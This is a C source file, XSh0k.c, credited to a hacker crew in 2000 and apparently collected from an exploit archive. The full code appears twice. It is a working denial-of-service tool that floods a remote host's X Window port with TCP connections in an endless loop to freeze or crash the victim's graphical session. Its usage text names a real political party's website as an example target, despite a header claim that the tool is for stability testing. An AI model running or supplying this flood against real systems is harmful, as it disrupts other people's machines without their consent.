epinna/XSh0k.c

## XSh0k.c
/*  2/5/00 1.0
    Xsh0k.c        by n0rby -- NeURaL CoLLaPsE CrEw.
             main code by AcidCrash -- NeURaL CoLLaPsE CrEw.

   This dos simply creates a sequence of socket connections to Xwindow port
   of a remote server. This cause a very disturbing effect to the XWindow user.
   There are many and various effects: frequently Xwindow slows so much that
   it's quite impossible to start new X programs; sometimes Xwindow don't
   recognizes some keys or mouse input, and, more rarely it crash and
   leave the user to the bash.

   A good metod to patch this vulnerability is to use a firewall to filter
   Xwindow ports. Therefore if you attack a filtered box with this dos, there
   there will be no effect.

   This dos was created to test Xwindow stability on *nix machines.
   It's coded for the flat line project
   and the NeURaL CoLLaPsE CrEw             --  www.ncl.cjb.net

          acidcrash@ncl.cjb.net    norby@ncl.cjb.net

*/

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

struct sockaddr_in addr;
char host[99+1];
struct hostent *hp;

int a,b,c,d;
int port;
int err;
int sock_stat;

/* Main ^__^ */

int main(int argc, char *argv[])  {

if (argc > 3 || argc == 1) {
printf("\n\033[1;32m Xsh0k.c \033[0m>> by \033[32m\\\033[0m\033[1;32mn0rby\033[0m\033[32m\\\033[0m");
printf("\n         >> main code by \033[32mA\033[0m\033[1;32mcid\033[0m\033[32mC\033[0m\033[1;32mrash\n");
printf("\n\033[1;32musage:\033[0m %s <\033[1;32mhost\033[0m> [\033[1;32mdisplay\033[0m]\n", argv[0]);
printf("\n\033[1;32mexample to attack a XWindows on third display (port 6003):\n");
printf("       \033[0m%s \033[1;32mwww.forza-italia.it\033[0m 3", argv[0]);
printf("\n\n[\033[1;32mdisplay\033[0m] = display to \033[1;32mfl\033[0m\033[32moo\033[0m\033[1;32md\033[0m. Default \033[1;32m:0\033[0m (port 6000)\n\n");
}

else {

/* networking */

if (sscanf(argv[1],"%d.%d.%d.%d",&a,&b,&c,&d) !=4)
{
hp = gethostbyname(argv[1]);


/* error check */

if (hp == NULL)
{
perror("\nAn error is occurred in host resolving");
printf("Checking:  errno=%d\n",errno);
exit(0);
}

/* continue */

sprintf(host,"%d.%d.%d.%d",(unsigned char)hp->h_addr_list[0][0],
                           (unsigned char)hp->h_addr_list[0][1],
                           (unsigned char)hp->h_addr_list[0][2],
                           (unsigned char)hp->h_addr_list[0][3]);
}
else
{
strncpy(host,argv[1],99);
}

/* setting display */

if (argc == 2) { port = 6000; }
if (argc == 3) { port = (atoi(argv[2]) + 6000); }               // Tnx to Torkemada 4 the help

/* Banner flooding */


printf("\n\033[1;32m Xsh0k.c \033[0m>> by \033[32m\\\033[0m\033[1;32mn0rby\033[0m\033[32m\\\033[0m");
printf("\n         >> main code by \033[32mA\033[0m\033[1;32mcid\033[0m\033[32mC\033[0m\033[1;32mrash\n");
printf("\nkilling \033[32mX\033[0m\033[1;32mwindows\033[0m on \033[1;32m%s\033[0m, ", argv[1]);
if (argc == 2) { printf("display \033[1;32m:0\033[0m"); }
else { printf("display \033[1;32m:%s\033[0m", argv[2]); }
printf("\n\n\033[1;32m_\033[0m\033[32m_\033[0m\033[1;32m_\033[0m\033[32m_\033[0m\033[1;32m_\033[0m\033[32m_\033[0m");
printf("\033[1;32m_\033[0m\033[32m_\033[0m\033[1;32m_\033[0m\033[32m_\033[0m\033[1;32m_\033[0m\033[32m_\033[0m");
printf("\033[1;32mF\033[0m\033[32mL\033[1;32ma\033[0m\033[32mT");         // Flat
printf(" \033[1;32mL\033[0m\033[32mi\033[1;32mN\033[0m\033[32me");        // Line

/* flood cicle */

for(;;)
{
sock();
fflush(stdout);
}
}
}


/* socket opening... */

int sock()
{
sock_stat = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);

    if (sock_stat < 0)
       {
       perror("\nAn error is occurred in port opening");
       printf("Checking:  errno=%d\n",errno);
       exit(2);
       }

addr.sin_family = PF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(host);

err = connect(sock_stat, (struct sockaddr *) &addr, sizeof(addr));

if (err < 0) {
printf("\033[1;32m H\033[0m\033[32ma\033[0m\033[1;32mS");                   // has
printf(" \033[0m\033[1;32mF\033[0m\033[32mo\033[0m\033[1;32mU\033[0m\033[32mn\033[0m\033[1;32mD"); // found
printf(" \033[0m\033[1;32mA\033[0m\033[32mn \033[0m");                //an
printf("\033[1;32mE\033[0m\033[32mr\033[0m\033[1;32mr\033[0m\033[32mo\033[0m\033[1;32mr\033[0m\033[32m.\033[0m\033[1;32m.\033[0m\033[32m.\n"); //err
perror("\033[32m");
printf("\033[0m\n");
exit(0);
}

printf("\033[1;32m_\033[0m");
}
	/* 2/5/00 1.0
	Xsh0k.c by n0rby -- NeURaL CoLLaPsE CrEw.
	main code by AcidCrash -- NeURaL CoLLaPsE CrEw.

	This dos simply creates a sequence of socket connections to Xwindow port
	of a remote server. This cause a very disturbing effect to the XWindow user.
	There are many and various effects: frequently Xwindow slows so much that
	it's quite impossible to start new X programs; sometimes Xwindow don't
	recognizes some keys or mouse input, and, more rarely it crash and
	leave the user to the bash.

	A good metod to patch this vulnerability is to use a firewall to filter
	Xwindow ports. Therefore if you attack a filtered box with this dos, there
	there will be no effect.

	This dos was created to test Xwindow stability on *nix machines.
	It's coded for the flat line project
	and the NeURaL CoLLaPsE CrEw -- www.ncl.cjb.net

	acidcrash@ncl.cjb.net norby@ncl.cjb.net

	*/

	#include <stdio.h>
	#include <stdlib.h>
	#include <errno.h>
	#include <sys/socket.h>
	#include <netinet/in.h>
	#include <netdb.h>

	struct sockaddr_in addr;
	char host[99+1];
	struct hostent *hp;

	int a,b,c,d;
	int port;
	int err;
	int sock_stat;

	/* Main ^__^ */

	int main(int argc, char *argv[]) {

	if (argc > 3 \|\| argc == 1) {
	printf("\n\033[1;32m Xsh0k.c \033[0m>> by \033[32m\\\033[0m\033[1;32mn0rby\033[0m\033[32m\\\033[0m");
	printf("\n >> main code by \033[32mA\033[0m\033[1;32mcid\033[0m\033[32mC\033[0m\033[1;32mrash\n");
	printf("\n\033[1;32musage:\033[0m %s <\033[1;32mhost\033[0m> [\033[1;32mdisplay\033[0m]\n", argv[0]);
	printf("\n\033[1;32mexample to attack a XWindows on third display (port 6003):\n");
	printf(" \033[0m%s \033[1;32mwww.forza-italia.it\033[0m 3", argv[0]);
	printf("\n\n[\033[1;32mdisplay\033[0m] = display to \033[1;32mfl\033[0m\033[32moo\033[0m\033[1;32md\033[0m. Default \033[1;32m:0\033[0m (port 6000)\n\n");
	}

	else {

	/* networking */

	if (sscanf(argv[1],"%d.%d.%d.%d",&a,&b,&c,&d) !=4)
	{
	hp = gethostbyname(argv[1]);



	/* error check */

	if (hp == NULL)
	{
	perror("\nAn error is occurred in host resolving");
	printf("Checking: errno=%d\n",errno);
	exit(0);
	}

	/* continue */

	sprintf(host,"%d.%d.%d.%d",(unsigned char)hp->h_addr_list[0][0],
	(unsigned char)hp->h_addr_list[0][1],
	(unsigned char)hp->h_addr_list[0][2],
	(unsigned char)hp->h_addr_list[0][3]);
	}
	else
	{
	strncpy(host,argv[1],99);
	}

	/* setting display */

	if (argc == 2) { port = 6000; }
	if (argc == 3) { port = (atoi(argv[2]) + 6000); } // Tnx to Torkemada 4 the help

	/* Banner flooding */


	printf("\n\033[1;32m Xsh0k.c \033[0m>> by \033[32m\\\033[0m\033[1;32mn0rby\033[0m\033[32m\\\033[0m");
	printf("\n >> main code by \033[32mA\033[0m\033[1;32mcid\033[0m\033[32mC\033[0m\033[1;32mrash\n");
	printf("\nkilling \033[32mX\033[0m\033[1;32mwindows\033[0m on \033[1;32m%s\033[0m, ", argv[1]);
	if (argc == 2) { printf("display \033[1;32m:0\033[0m"); }
	else { printf("display \033[1;32m:%s\033[0m", argv[2]); }
	printf("\n\n\033[1;32m_\033[0m\033[32m_\033[0m\033[1;32m_\033[0m\033[32m_\033[0m\033[1;32m_\033[0m\033[32m_\033[0m");
	printf("\033[1;32m_\033[0m\033[32m_\033[0m\033[1;32m_\033[0m\033[32m_\033[0m\033[1;32m_\033[0m\033[32m_\033[0m");
	printf("\033[1;32mF\033[0m\033[32mL\033[1;32ma\033[0m\033[32mT"); // Flat
	printf(" \033[1;32mL\033[0m\033[32mi\033[1;32mN\033[0m\033[32me"); // Line

	/* flood cicle */

	for(;;)
	{
	sock();
	fflush(stdout);
	}
	}
	}


	/* socket opening... */

	int sock()
	{
	sock_stat = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);

	if (sock_stat < 0)
	{
	perror("\nAn error is occurred in port opening");
	printf("Checking: errno=%d\n",errno);
	exit(2);
	}

	addr.sin_family = PF_INET;
	addr.sin_port = htons(port);
	addr.sin_addr.s_addr = inet_addr(host);

	err = connect(sock_stat, (struct sockaddr *) &addr, sizeof(addr));

	if (err < 0) {
	printf("\033[1;32m H\033[0m\033[32ma\033[0m\033[1;32mS"); // has
	printf(" \033[0m\033[1;32mF\033[0m\033[32mo\033[0m\033[1;32mU\033[0m\033[32mn\033[0m\033[1;32mD"); // found
	printf(" \033[0m\033[1;32mA\033[0m\033[32mn \033[0m"); //an
	printf("\033[1;32mE\033[0m\033[32mr\033[0m\033[1;32mr\033[0m\033[32mo\033[0m\033[1;32mr\033[0m\033[32m.\033[0m\033[1;32m.\033[0m\033[32m.\n"); //err
	perror("\033[32m");
	printf("\033[0m\n");
	exit(0);
	}

	printf("\033[1;32m_\033[0m");
	}